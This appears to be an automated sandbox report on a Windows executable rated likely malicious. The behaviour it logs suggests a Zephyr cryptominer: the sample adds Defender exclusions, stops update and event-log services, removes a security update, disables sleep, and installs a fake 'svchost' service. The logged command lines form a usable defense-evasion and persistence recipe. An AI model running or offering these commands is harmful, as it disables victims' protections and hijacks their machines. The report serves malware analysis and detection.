Analysis Overview
SHA256
0d7852074aa6b39aa9063384632245092679978969a229f4a97fc8d5bb109ee8
Threat Level: Likely malicious
The file zephyr 100.exe was found to be: Likely malicious.
Malicious Activity Summary
Creates new service(s)
Stops running service(s)
Launches sc.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-04-07 22:29
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-04-07 22:29
Reported
2024-04-07 23:02
Platform
win10-20240319-en
Max time kernel
33s
Max time network
44s
Command Line
Signatures
Creates new service(s)
Stops running service(s)
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\zephyr 100.exe | N/A |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\zephyr 100.exe
"C:\Users\Admin\AppData\Local\Temp\zephyr 100.exe"
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "svchost"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "svchost" binpath= "C:\ProgramData\RunDLL\taskhostw.exe" start= "auto"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "svchost"
C:\ProgramData\RunDLL\taskhostw.exe
C:\ProgramData\RunDLL\taskhostw.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
\??\c:\windows\system32\sihost.exe
sihost.exe
\??\c:\windows\system32\sihost.exe
sihost.exe
\??\c:\windows\system32\sihost.exe
sihost.exe
\??\c:\windows\system32\sihost.exe
sihost.exe
\??\c:\windows\system32\sihost.exe
sihost.exe
\??\c:\windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\dialer.exe
dialer.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ru.zephyr.herominers.com | udp |
| FI | 37.27.63.72:1123 | ru.zephyr.herominers.com | tcp |
Files
memory/4520-4-0x000001D924650000-0x000001D924672000-memory.dmp
memory/4520-5-0x00007FFB9D2B0000-0x00007FFB9DC9C000-memory.dmp
memory/4520-6-0x000001D9244E0000-0x000001D9244F0000-memory.dmp
memory/4520-8-0x000001D9244E0000-0x000001D9244F0000-memory.dmp
memory/4520-10-0x000001D93CC90000-0x000001D93CD06000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zotnjry0.yxf.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4520-23-0x000001D9244E0000-0x000001D9244F0000-memory.dmp
memory/4520-46-0x000001D9244E0000-0x000001D9244F0000-memory.dmp
memory/4520-49-0x00007FFB9D2B0000-0x00007FFB9DC9C000-memory.dmp
memory/3892-50-0x0000000140000000-0x000000014002B000-memory.dmp
memory/3892-53-0x0000000140000000-0x000000014002B000-memory.dmp
memory/3892-57-0x00007FFBBAC40000-0x00007FFBBAE1B000-memory.dmp
memory/3892-58-0x00007FFBBA510000-0x00007FFBBA5BE000-memory.dmp
memory/3892-55-0x0000000140000000-0x000000014002B000-memory.dmp
memory/3892-52-0x0000000140000000-0x000000014002B000-memory.dmp
memory/600-65-0x000002431C620000-0x000002431C64B000-memory.dmp
memory/600-67-0x000002431C620000-0x000002431C64B000-memory.dmp
memory/652-69-0x00007FFB7ACD0000-0x00007FFB7ACE0000-memory.dmp
memory/600-68-0x00007FFBBACE5000-0x00007FFBBACE6000-memory.dmp
memory/652-72-0x000001B247220000-0x000001B24724B000-memory.dmp
memory/740-79-0x00007FFB7ACD0000-0x00007FFB7ACE0000-memory.dmp
memory/912-82-0x000001FDABD00000-0x000001FDABD2B000-memory.dmp
memory/912-87-0x00007FFB7ACD0000-0x00007FFB7ACE0000-memory.dmp
memory/912-88-0x000001FDABD00000-0x000001FDABD2B000-memory.dmp
memory/648-96-0x0000023F49160000-0x0000023F4918B000-memory.dmp
memory/380-94-0x00007FFB7ACD0000-0x00007FFB7ACE0000-memory.dmp
memory/648-98-0x00007FFB7ACD0000-0x00007FFB7ACE0000-memory.dmp
memory/1088-103-0x000001BFB5DE0000-0x000001BFB5E0B000-memory.dmp
memory/1088-106-0x00007FFB7ACD0000-0x00007FFB7ACE0000-memory.dmp
memory/864-105-0x00007FFB7ACD0000-0x00007FFB7ACE0000-memory.dmp
memory/1132-108-0x000001FA69760000-0x000001FA6978B000-memory.dmp
memory/1204-114-0x0000023E4CD90000-0x0000023E4CDBB000-memory.dmp
memory/1212-122-0x0000022CA7460000-0x0000022CA748B000-memory.dmp
memory/1204-121-0x0000023E4CD90000-0x0000023E4CDBB000-memory.dmp
memory/1220-128-0x0000022716DD0000-0x0000022716DFB000-memory.dmp
memory/3892-132-0x00007FFBBAC40000-0x00007FFBBAE1B000-memory.dmp
memory/1212-138-0x0000022CA7460000-0x0000022CA748B000-memory.dmp
memory/1276-133-0x000001FD01E90000-0x000001FD01EBB000-memory.dmp
memory/1220-129-0x00007FFB7ACD0000-0x00007FFB7ACE0000-memory.dmp
memory/1212-127-0x00007FFB7ACD0000-0x00007FFB7ACE0000-memory.dmp
memory/1204-119-0x00007FFB7ACD0000-0x00007FFB7ACE0000-memory.dmp
memory/676-118-0x00007FFB9D2B0000-0x00007FFB9DC9C000-memory.dmp
memory/1132-112-0x00007FFB7ACD0000-0x00007FFB7ACE0000-memory.dmp
memory/864-100-0x0000020B7ECD0000-0x0000020B7ECFB000-memory.dmp
memory/380-93-0x0000021CC0790000-0x0000021CC07BB000-memory.dmp
memory/1004-85-0x00007FFB7ACD0000-0x00007FFB7ACE0000-memory.dmp
memory/1004-83-0x0000020529FB0000-0x0000020529FDB000-memory.dmp
C:\ProgramData\RunDLL\taskhostw.exe
| MD5 | af3706e699c90f1b5e1fdb5201e6d8ec |
| SHA1 | 2c219b9b3c90140d5e9361b1fa61130ca6dda281 |
| SHA256 | 0d7852074aa6b39aa9063384632245092679978969a229f4a97fc8d5bb109ee8 |
| SHA512 | 1bfb95adc9aa0a3ac340cda9608bdc0c824fd82f61b63929c4dfaabe290b0cd8ffa05fd51886dd46a05a6603eebeb9f2a54c9eb3df146fda83f8720ce286789e |
memory/740-75-0x0000028D87A90000-0x0000028D87ABB000-memory.dmp
memory/652-70-0x00007FFBBACE5000-0x00007FFBBACE6000-memory.dmp
memory/652-66-0x000001B247220000-0x000001B24724B000-memory.dmp
memory/600-63-0x000002431C5F0000-0x000002431C614000-memory.dmp
memory/676-142-0x000001C6D0210000-0x000001C6D0220000-memory.dmp
memory/3892-59-0x0000000140000000-0x000000014002B000-memory.dmp
memory/3892-51-0x0000000140000000-0x000000014002B000-memory.dmp
memory/676-148-0x000001C6D0210000-0x000001C6D0220000-memory.dmp
memory/1276-159-0x000001FD01E90000-0x000001FD01EBB000-memory.dmp
memory/1440-162-0x000001673E600000-0x000001673E62B000-memory.dmp
memory/676-319-0x000001C6D01A0000-0x000001C6D01BC000-memory.dmp
memory/676-318-0x00007FF6AC230000-0x00007FF6AC240000-memory.dmp
memory/912-442-0x000001FDABD00000-0x000001FDABD2B000-memory.dmp
memory/380-445-0x0000021CC0790000-0x0000021CC07BB000-memory.dmp
memory/676-448-0x000001C6D0210000-0x000001C6D0220000-memory.dmp
memory/2380-525-0x00007FFBBAC40000-0x00007FFBBAE1B000-memory.dmp
memory/2380-527-0x00007FFBBA510000-0x00007FFBBA5BE000-memory.dmp
memory/648-551-0x0000023F49160000-0x0000023F4918B000-memory.dmp
memory/912-557-0x000001FDABDA0000-0x000001FDABDCB000-memory.dmp
memory/1088-561-0x000001BFB5DE0000-0x000001BFB5E0B000-memory.dmp
memory/648-571-0x0000023F491C0000-0x0000023F491EB000-memory.dmp
memory/1088-576-0x000001BFB5E70000-0x000001BFB5E9B000-memory.dmp
memory/1132-579-0x000001FA697C0000-0x000001FA697EB000-memory.dmp